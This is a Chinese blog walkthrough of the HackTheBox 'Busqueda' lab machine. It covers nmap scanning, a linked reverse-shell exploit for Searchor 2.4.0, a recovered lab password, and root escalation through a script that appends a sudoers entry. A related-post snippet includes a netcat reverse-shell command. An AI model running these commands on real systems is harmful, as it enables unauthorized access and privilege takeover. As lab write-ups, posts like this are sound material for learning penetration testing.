HTB Busqueda靶机渗透测试流程

最新推荐文章于 2024-06-17 12:57:20 发布
最新推荐文章于 2024-06-17 12:57:20 发布
阅读量149 收藏
点赞数
文章标签: web安全 linux 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/131904990
版权

靶机介绍

来源:HackTheBox        靶机名:Busqueda        难度:Easy

信息收集 

主机探测

ping 10.10.11.208

靶机存活

端口扫描

sudo nmap -sT --min-rate 10000 -p- 10.10.11.208

可以看到22,80,8080开放

 

 版本探测

sudo nmap -sT -sC -sV -O -p 22,80,8080 10.10.11.208  

22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http        Apache httpd 2.4.52

Linux

8080跑代理

漏洞脚本扫描 

sudo nmap -sT --script=vuln -p 22,80,8080 10.10.11.208

没有可利用的漏洞

渗透过程

修改/etc/hosts

修改/etc/hosts,否则访问80端口无法访问到

漏洞利用 

访问80端口,发现Searchor 2.4.0

网上搜索得到exploit

地址:

GitHub - nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection: Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)

 

Kali开启监听并执行exploit,成功获得反弹shell

在家目录下发现flag

 

敏感信息

查看是否有suid权限,发现需要密码才能查看

在www目录下扫描文件,发现git仓库的文件夹

 

 

查看config文件,发现疑似账户密码的信息

cody jh1usoih2bkjaspwe92

SSH登录 

查看/etc/passwd,可登录用户仅root和svc

 

使用该密码能够重新ssh登录到svc,重新查看发现可以执行以下命令

/usr/bin/python3 /opt/scripts/system-checkup.py

权限提升

进入目录,查看信息发现只有执行权

尝试直接运行,根据结果猜测估计是执行full-checkup.sh脚本

 

 

在tmp目录下新建一个full-checkup.sh

输入以下内容

echo "svc ALL=(ALL:ALL) ALL">>/etc/sudoers

授予执行权限

Chmod 777 full-checkup.sh

执行文件提权到root,查看flag

032ed3083fa86602c492bc231500651d

总结

通过nday漏洞获得反弹shell,查找敏感文件进行ssh登录,最后利用suid提权。

 

 

Teardrop、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB Busqueda WriteUP
qq_58869808的博客
04-09 6687
Busqueda WriteUP
HTB Mailroom WriteUp
qq_58869808的博客
04-30 3002
HTB MailRomm Wp
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
HTB打靶日记:Stocker
01-15
hackthebox
htb:破解盒子的演练
01-31
htb 破解盒子的演练
java开发得oa系统源码-Pentest:渗透测试
06-05
java开发得oa系统源码免责声明 此页面上描述的工具技术和程序应仅用于经批准的渗透测试、CTF 和其他合法黑客挑战网站。 与本网站所含材料相关的任何行为或活动均由用户自行负责,网站所有者与此无关。 如果任何个人滥用其中包含的信息以违反法律而受到刑事指控,本网站的作者将不承担任何责任。 描述 这个网站最初是作为一个地方来存储与渗透测试相关的笔记,同时处理 HTB 挑战和学习攻势安全认证专家 (OSCP) 考试。 我现在将这些内容公之于众,以感谢 offsec 社区,希望它对其他人的信息安全之旅有所帮助。 需要注意的一点是,我不对以下内容声明任何所有权,相反,这更像是我使用过的有用命令、工具和资源的精选列表。 最后,这是一个正在进行中的网站,欢迎对更改/添加发表评论。 内容 枚举 网络地图 默认脚本,枚举版本,o/p 所有格式。 nmap -sC -sV -oA nmap <IP> 扫描顶级 UDP 端口、SNMP、TFTP 等。 nmap -sU --top-ports 20 扫描所有端口 nmap -p- <IP> 漏洞扫描 nmap --script vuln <IP> nmap
HTB PC靶机渗透测试流程
RemedyVI的博客
08-09 267
通过50051的grpc端口服务,配合grpcui得知存在SQL注入漏洞,利用sqlmap获取到用户,并成功登录到ssh,最后利用pyLoad的远程命令执行漏洞getshell并提权。
HTB单线策略测试
08-18
HTB单线策略测试,
HTB-Busqueda
TA不懒,但还没有添加简介
05-11 651
HTB-Busqueda
htb busqueda wp要点记录
mikumiku~
04-15 521
靶机的思路侧重点分为三部分:1.fuzz2.信息收集3.审计
hackthebox Busqueda EASY难度 一把梭哈
qq_29060627的博客
04-23 331
自动执行sudo命令,自动给sudo命令输入密码:jh1usoih2bkjaspwe92。
HTB Pilgrimage靶机渗透测试流程
RemedyVI的博客
07-23 408
通过信息泄露得到项目部分源码,然后利用imagemagic的任意文件读取漏洞读取sqlite的db文件,获取user表里的用户名和密码,利用该密码登录到ssh,最后通过一个监控任务里的binwalk的RCE漏洞提权。
HackTheBox-Machines--Busqueda
七天
04-15 412
Busqueda 测试过程。
oscp——HTB——Bastard
王嘟嘟的博客
05-20 540
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Webshell 这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell 使用脚本直接getshell 0x03 Webshell——Rootshell 传一个nc 上去然后反弹一个shell nc.exe -e cmd 10.10.14.6 1234 这里可以使用Sherlock先进行扫描。 powershell.exe -exec bypass -Command "& {Imp
网络安全和信息安全
waitaikong_的博客
06-12 616
信息安全网络安全网络空间安全是当前信息技术领域内的三个重要概念,它们在某些方面有着紧密的联系,同时在不同的语境和应用场景下又有所区别。本次分析旨在深入理解这三个概念的定义、内涵及其相互关系,以便更好地应用于实际工作中。综上所述,信息安全网络安全网络空间安全是三个密切相关但又各具特色的概念。信息安全关注的是信息本身的保护,网络安全侧重于网络环境和设施的安全,而网络空间安全则是一个更全面的框架,它不仅包括了信息安全网络安全的内容,还延伸到了更广泛的社会和法律层面。
网络安全(补充)
m0_62207482的博客
06-12 1280
虚拟专用网中可以采用隧道技术 IPSec的加密和认证过程中所使用的密钥由IKE机制来生成和分发 传输模式下的AH和ESP处理后的IP头部不变,而隧道模式下的AH和ESP处理后需要新封装一个新的IP头 SSL协议可分为两层,处于下层的是SSL记录 SSL握手协议,由三种协议组合而成,包含握手协议、密码规格变更协议及报警协议。其用途是在两个应用程序开始传送或接收数据前,为其提供服务器和客户端间相互认证的服务,并相互协商决定双方通信使用的加密算法及加密密钥 属于第二层隧道协议的是PPTP和L2TP,第二
网络安全网络安全威胁及途径
衍生星球的博客
06-17 45
目前,网络的主要应用包括:电子商务、网上银行、股票、证券、期货交易、即时通信、邮件、网游、下载文件或点击链接等,这些应用都存在大量的安全威胁和隐患。网络安全管理中出现的漏洞和疏忽都属于人为因素,网络安全中最突出的问题是缺乏完善的法律法规、管理准则规范和制度、网络安全组织机构及人员,不够重视或缺少安全检测及实时有效的监控、维护和审计。网络安全的威胁和风险主要涉及网络系统研发、结构、层次、范畴、应用和管理等,要做好网络安全防范,必须进行认真深入的调研、分析和研究,以解决网络系统的安全风险及隐患。
打破安全设备孤岛,多源威胁检测与响应(XDR)如何构建一体化安全防线
安胜ANSCEN的博客
06-14 627
在企业常态化安全运营中,星盾多源威胁检测与响应(XDR)平台可灵活伸缩部署,融汇多源数据与能力,为安全运营团队提供统一的网络资产画像、自动化的威胁检测与响应、全面的安全态势、灵活可定义的指挥调度规范,助力企业建立高效的网络安全防御与响应体系。在网络安全防御体系的构建中,尽管部署了防火墙、入侵检测系统(IDS/IPS)、加密设备、网络流量分析工具等多种安全防御产品和措施,若这些产品之间无法进行有效的联动与协作机制,不仅降低了整体防护效果,还增加了管理的复杂性和成本。
网络安全:SQL注入防范
最新发布
浪里个狼游记
06-17 227
防范SQL注入需要综合运用多种技术和最佳实践。通过采取上述措施,我们可以大大降低应用程序和数据库遭受SQL注入攻击的风险。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值